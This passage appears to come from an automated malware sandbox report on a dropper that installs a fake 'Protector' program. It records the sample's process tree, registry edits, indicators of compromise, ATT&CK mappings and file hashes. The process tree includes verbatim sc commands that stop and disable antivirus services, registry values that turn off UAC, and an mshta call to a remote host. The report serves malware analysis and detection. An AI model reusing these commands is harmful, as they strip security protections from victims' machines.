Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version\ = "1.0" 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA} 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ = "C:\\Windows\\SysWOW64\\Com\\mtsadmin.tlb" 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ 56m04a7z799e88f.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3764 56m04a7z799e88f.exe Token: SeShutdownPrivilege 3764 56m04a7z799e88f.exe Token: SeDebugPrivilege 2776 Protector-cphn.exe Token: SeShutdownPrivilege 2776 Protector-cphn.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 4884 iexplore.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3764 56m04a7z799e88f.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 2776 Protector-cphn.exe 4884 iexplore.exe 4884 iexplore.exe 3640 IEXPLORE.EXE 3640 IEXPLORE.EXE 3640 IEXPLORE.EXE 3640 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 4916 wrote to memory of 4492 4916 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe 87 PID 4916 wrote to memory of 4492 4916 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe 87 PID 4916 wrote to memory of 4492 4916 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe 87 PID 4492 wrote to memory of 3764 4492 dvj45s81vl7c89u.exe 88 PID 4492 wrote to memory of 3764 4492 dvj45s81vl7c89u.exe 88 PID 4492 wrote to memory of 3764 4492 dvj45s81vl7c89u.exe 88 PID 3764 wrote to memory of 2776 3764 56m04a7z799e88f.exe 90 PID 3764 wrote to memory of 2776 3764 56m04a7z799e88f.exe 90 PID 3764 wrote to memory of 2776 3764 56m04a7z799e88f.exe 90 PID 3764 wrote to memory of 1988 3764 56m04a7z799e88f.exe 91 PID 3764 wrote to memory of 1988 3764 56m04a7z799e88f.exe 91 PID 3764 wrote to memory of 1988 3764 56m04a7z799e88f.exe 91 PID 2776 wrote to memory of 456 2776 Protector-cphn.exe 93 PID 2776 wrote to memory of 456 2776 Protector-cphn.exe 93 PID 2776 wrote to memory of 456 2776 Protector-cphn.exe 93 PID 2776 wrote to memory of 1476 2776 Protector-cphn.exe 104 PID 2776 wrote to memory of 1476 2776 Protector-cphn.exe 104 PID 2776 wrote to memory of 1476 2776 Protector-cphn.exe 104 PID 2776 wrote to memory of 2268 2776 Protector-cphn.exe 105 PID 2776 wrote to memory of 2268 2776 Protector-cphn.exe 105 PID 2776 wrote to memory of 2268 2776 Protector-cphn.exe 105 PID 2776 wrote to memory of 3564 2776 Protector-cphn.exe 106 PID 2776 wrote to memory of 3564 2776 Protector-cphn.exe 106 PID 2776 wrote to memory of 3564 2776 Protector-cphn.exe 106 PID 2776 wrote to memory of 2900 2776 Protector-cphn.exe 108 PID 2776 wrote to memory of 2900 2776 Protector-cphn.exe 108 PID 2776 wrote to memory of 2900 2776 Protector-cphn.exe 108 PID 2776 wrote to memory of 780 2776 Protector-cphn.exe 110 PID 2776 wrote to memory of 780 2776 Protector-cphn.exe 110 PID 2776 wrote to memory of 780 2776 Protector-cphn.exe 110 PID 2776 wrote to memory of 4080 2776 Protector-cphn.exe 112 PID 2776 wrote to memory of 4080 2776 Protector-cphn.exe 112 PID 2776 wrote to memory of 4080 2776 Protector-cphn.exe 112 PID 2776 wrote to memory of 1528 2776 Protector-cphn.exe 113 PID 2776 wrote to memory of 1528 2776 Protector-cphn.exe 113 PID 2776 wrote to memory of 1528 2776 Protector-cphn.exe 113 PID 2776 wrote to memory of 1464 2776 Protector-cphn.exe 114 PID 2776 wrote to memory of 1464 2776 Protector-cphn.exe 114 PID 2776 wrote to memory of 1464 2776 Protector-cphn.exe 114 PID 2776 wrote to memory of 4884 2776 Protector-cphn.exe 120 PID 2776 wrote to memory of 4884 2776 Protector-cphn.exe 120 PID 4884 wrote to memory of 3640 4884 iexplore.exe 123 PID 4884 wrote to memory of 3640 4884 iexplore.exe 123 PID 4884 wrote to memory of 3640 4884 iexplore.exe 123 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-cphn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-cphn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-cphn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-cphn.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\dvj45s81vl7c89u.exe" -e -p7k3y195xurds9tc2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\56m04a7z799e88f.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Users\Admin\AppData\Roaming\Protector-cphn.exeC:\Users\Admin\AppData\Roaming\Protector-cphn.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2776 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1"5⤵
- System Location Discovery: System Language Discovery
PID:456
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1476
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2268
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3564
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:780
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4080
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1528
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1464
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" res://ieframe.dll/dnserrordiagoff.htm#http://www.cmyip.com/5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4884 CREDAT:17410 /prefetch:26⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3640
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\56M04A~1.EXE" >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:1988
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5ee4ada789158c1e5a14d597cf1d5edd0
SHA19593aee78d30d51ab93d6a29dc4dc873e0d466b6
SHA256903a6d82bf2fe8951104cf90d9f64aab0fbded30a2246e678a80d07868569b4f
SHA512a6214f62e5089512aeaabab7c4bb38e8663fb55d5f4129c57e726723dad10802ec40c3dc836087713b77c1874c12f177bf2b2998fd3e52f4210c1c5307885c16
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD536c1eda34c01e5ce21e7bba810202b7a
SHA112a0a24749dae9e0688c402237f071df006beeb7
SHA25665c8cd605767e6e40458e14088393d6d8f389a12d83add67698c613df5498a44
SHA5125a615fba0a3b863d67bacf4df3d161a64dde2e0a62f994201b124973f27aa21999fc3be603b7a3f2d0c6cf04578501d1f4f617d03eed5897ecd1867599c36064
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
1.9MB
MD5cb29fc6c4d1be6464d118d58750c7286
SHA1d942e69817be663057275b373b308f6f4a5bdea4
SHA256a0ce0051ee944ea54a214588d183deb2b7e72d6aa9d9180fcd16888cf232bef9
SHA512bd1891c0f015ec27c3a5f99c9b89f7f6cd87b9edd2d4e59a79ebfcb1fb35d836b597fec509ca7694ef608e2dd86e0d8d68617587fe649df8fe66db6bd6f492a7
-
Filesize
1.8MB
MD5c0ecef6a5e45a04e9b341ef74a4dd08f
SHA1f1d33665ab2ae2c658bbe6f64dee0986c3ba3d5a
SHA2567f7b866445fd82fb423144bc7403af987a0ae4c1e27d38387a7ba84708856f5d
SHA512fdb0907b853db79d32ca8a0b23fed2c31e2886d247a7d09dc6154b42af734c8ee8da08c9bc7078e9dbc53b15a24d7a85bfabaa0ccd281f314a993a23c15157ac